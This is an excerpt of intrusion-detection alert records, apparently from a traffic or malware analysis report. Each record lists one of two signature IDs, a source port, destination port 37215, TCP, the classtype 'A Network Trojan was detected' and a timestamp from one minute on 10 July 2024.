                  SID:2829579
                  Source Port:42912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.942204
                  SID:2829579
                  Source Port:57424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.479200
                  SID:2835222
                  Source Port:33178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.340754
                  SID:2829579
                  Source Port:41174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.373658
                  SID:2835222
                  Source Port:53740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.596367
                  SID:2829579
                  Source Port:49714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.644926
                  SID:2835222
                  Source Port:38422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.751683
                  SID:2835222
                  Source Port:41210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.624887
                  SID:2835222
                  Source Port:46350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.051203
                  SID:2829579
                  Source Port:49120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.242772
                  SID:2835222
                  Source Port:33528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.479166
                  SID:2835222
                  Source Port:33766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.777569
                  SID:2835222
                  Source Port:36978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.056548
                  SID:2835222
                  Source Port:34974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.750468
                  SID:2835222
                  Source Port:42030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369832
                  SID:2829579
                  Source Port:47328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.230409
                  SID:2829579
                  Source Port:51022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.967479
                  SID:2829579
                  Source Port:52752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.006056
                  SID:2835222
                  Source Port:39068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.924774
                  SID:2835222
                  Source Port:40232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.318227
                  SID:2835222
                  Source Port:40482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361237
                  SID:2829579
                  Source Port:32776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.230010
                  SID:2835222
                  Source Port:44814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.929002
                  SID:2829579
                  Source Port:48730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.122449
                  SID:2829579
                  Source Port:39248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.050369
                  SID:2829579
                  Source Port:38544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.913087
                  SID:2835222
                  Source Port:39932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.976996
                  SID:2829579
                  Source Port:44216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.569542
                  SID:2835222
                  Source Port:59902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.558711
                  SID:2829579
                  Source Port:32882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.083143
                  SID:2835222
                  Source Port:41170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.845496
                  SID:2835222
                  Source Port:47750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.608891
                  SID:2835222
                  Source Port:42114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.404948
                  SID:2829579
                  Source Port:53488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.614311
                  SID:2835222
                  Source Port:33588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.095696
                  SID:2835222
                  Source Port:50012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.602369
                  SID:2835222
                  Source Port:50492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.338726
                  SID:2829579
                  Source Port:36766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.362536
                  SID:2829579
                  Source Port:59738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.619076
                  SID:2835222
                  Source Port:36312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.372263
                  SID:2835222
                  Source Port:34914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.821658
                  SID:2835222
                  Source Port:50304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.898852
                  SID:2835222
                  Source Port:56374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.247004
                  SID:2835222
                  Source Port:54146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.881994
                  SID:2829579
                  Source Port:39980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.549983
                  SID:2829579
                  Source Port:38148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.423540
                  SID:2829579
                  Source Port:58172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.144985
                  SID:2835222
                  Source Port:50690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.546125
                  SID:2835222
                  Source Port:35588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.516253
                  SID:2835222
                  Source Port:35390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.937517
                  SID:2829579
                  Source Port:40534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.638729
                  SID:2829579
                  Source Port:44812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.297905
                  SID:2829579
                  Source Port:45766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.838798
                  SID:2835222
                  Source Port:35102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.597902
                  SID:2829579
                  Source Port:42702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.164918
                  SID:2835222
                  Source Port:34212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.939939
                  SID:2835222
                  Source Port:50418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.432094
                  SID:2835222
                  Source Port:32830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.149235
                  SID:2829579
                  Source Port:56564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.592193
                  SID:2829579
                  Source Port:59908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.812740
                  SID:2829579
                  Source Port:52402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.320744
                  SID:2835222
                  Source Port:41292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.134396
                  SID:2829579
                  Source Port:51134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.342760
                  SID:2829579
                  Source Port:39662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.181410
                  SID:2835222
                  Source Port:57884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.740584
                  SID:2829579
                  Source Port:57764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.839204
                  SID:2829579
                  Source Port:43094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.867801
                  SID:2829579
                  Source Port:52740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.833668
                  SID:2835222
                  Source Port:35706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.974758
                  SID:2829579
                  Source Port:36020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.151266
                  SID:2829579
                  Source Port:44290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.895563
                  SID:2829579
                  Source Port:53402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.207018
                  SID:2835222
                  Source Port:43926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.490604
                  SID:2835222
                  Source Port:57310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.838617
                  SID:2835222
                  Source Port:37002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.619051
                  SID:2829579
                  Source Port:50256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.863789
                  SID:2829579
                  Source Port:41774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.349242
                  SID:2835222
                  Source Port:34998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.765142
                  SID:2829579
                  Source Port:33808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.796978
                  SID:2829579
                  Source Port:33030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:21.440829
                  SID:2829579
                  Source Port:55796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.190243
                  SID:2835222
                  Source Port:52712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.069901
                  SID:2829579
                  Source Port:38508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.700547
                  SID:2835222
                  Source Port:41410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.822336
                  SID:2835222
                  Source Port:60024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.461924
                  SID:2835222
                  Source Port:60260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.915892
                  SID:2835222
                  Source Port:34648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.445058
                  SID:2835222
                  Source Port:48100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.621059
                  SID:2829579
                  Source Port:33164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.517538
                  SID:2829579
                  Source Port:53806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.463708
                  SID:2829579
                  Source Port:33396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.839655
                  SID:2835222
                  Source Port:42916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.908233
                  SID:2829579
                  Source Port:54922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.155945
                  SID:2835222
                  Source Port:52110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835988
                  SID:2829579
                  Source Port:50278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810322
                  SID:2835222
                  Source Port:42906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.117995
                  SID:2835222
                  Source Port:60998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.905348
                  SID:2835222
                  Source Port:40760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.920658
                  SID:2835222
                  Source Port:43520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.021815
                  SID:2835222
                  Source Port:51368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.084191
                  SID:2835222
                  Source Port:43494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.871233
                  SID:2829579
                  Source Port:43748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.138440
                  SID:2835222
                  Source Port:50230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.968110
                  SID:2829579
                  Source Port:60702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081950
                  SID:2829579
                  Source Port:53136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.377944
                  SID:2835222
                  Source Port:54062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.224532
                  SID:2835222
                  Source Port:56292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.116364
                  SID:2829579
                  Source Port:35990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.365798
                  SID:2829579
                  Source Port:37532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.630985
                  SID:2835222
                  Source Port:54456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.689039
                  SID:2829579
                  Source Port:40858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.668583
                  SID:2829579
                  Source Port:58488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.761249
                  SID:2829579
                  Source Port:33302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.961786
                  SID:2829579
                  Source Port:46442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.585966
                  SID:2829579
                  Source Port:60262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.817367
                  SID:2829579
                  Source Port:55056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589872
                  SID:2829579
                  Source Port:50614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.556595
                  SID:2829579
                  Source Port:48250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.716778
                  SID:2829579
                  Source Port:47222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.571103
                  SID:2829579
                  Source Port:37846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.861772
                  SID:2835222
                  Source Port:48870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.131981
                  SID:2829579
                  Source Port:43786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.445688
                  SID:2829579
                  Source Port:43264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.482500
                  SID:2829579
                  Source Port:40676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.564471
                  SID:2835222
                  Source Port:56972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.240664
                  SID:2829579
                  Source Port:55506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.626418
                  SID:2829579
                  Source Port:35662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.825440
                  SID:2835222
                  Source Port:35190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.775624
                  SID:2829579
                  Source Port:44364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810322
                  SID:2835222
                  Source Port:46938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.583346
                  SID:2829579
                  Source Port:51952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.714102
                  SID:2835222
                  Source Port:59576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.641712
                  SID:2829579
                  Source Port:56180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.548548
                  SID:2835222
                  Source Port:56142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.215943
                  SID:2835222
                  Source Port:48074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.127145
                  SID:2835222
                  Source Port:44212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.072702
                  SID:2835222
                  Source Port:45790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.214237
                  SID:2835222
                  Source Port:34532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.685142
                  SID:2835222
                  Source Port:56964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:44.495455
                  SID:2835222
                  Source Port:39946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.421947
                  SID:2835222
                  Source Port:39042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.170794
                  SID:2829579
                  Source Port:51706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885642
                  SID:2829579
                  Source Port:54716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.879112
                  SID:2829579
                  Source Port:45220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.134313
                  SID:2829579
                  Source Port:54362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.263380
                  SID:2835222
                  Source Port:39010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.942646
                  SID:2835222
                  Source Port:39674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.192444
                  SID:2835222
                  Source Port:40410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.841830
                  SID:2835222
                  Source Port:56526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.095778
                  SID:2829579
                  Source Port:33782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.440883
                  SID:2829579
                  Source Port:49910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.807023
                  SID:2829579
                  Source Port:35728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.271475
                  SID:2829579
                  Source Port:46152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.501426
                  SID:2835222
                  Source Port:37886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.610191
                  SID:2835222
                  Source Port:35234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.616284
                  SID:2829579
                  Source Port:57438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.085060
                  SID:2829579
                  Source Port:46404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.616347
                  SID:2829579
                  Source Port:44736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.498164
                  SID:2829579
                  Source Port:45560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.360429
                  SID:2829579
                  Source Port:37992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.540964
                  SID:2835222
                  Source Port:57248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.466841
                  SID:2829579
                  Source Port:37306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.847892
                  SID:2835222
                  Source Port:46696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.206981
                  SID:2835222
                  Source Port:48124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.202675
                  SID:2829579
                  Source Port:40774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.243243
                  SID:2829579
                  Source Port:40096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.512805
                  SID:2835222
                  Source Port:51314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.856621
                  SID:2835222
                  Source Port:40014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.807864
                  SID:2829579
                  Source Port:41820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.867302
                  SID:2835222
                  Source Port:58808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.949635
                  SID:2835222
                  Source Port:45954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.054168
                  SID:2829579
                  Source Port:44246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.642305
                  SID:2829579
                  Source Port:46646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.643057
                  SID:2829579
                  Source Port:56208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.244914
                  SID:2829579
                  Source Port:53602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.909297
                  SID:2829579
                  Source Port:41738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.029785
                  SID:2829579
                  Source Port:36158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.780678
                  SID:2835222
                  Source Port:42934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.177763
                  SID:2835222
                  Source Port:37200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.029781
                  SID:2829579
                  Source Port:39190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.923936
                  SID:2829579
                  Source Port:40144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.612567
                  SID:2835222
                  Source Port:38074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.093817
                  SID:2835222
                  Source Port:36194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
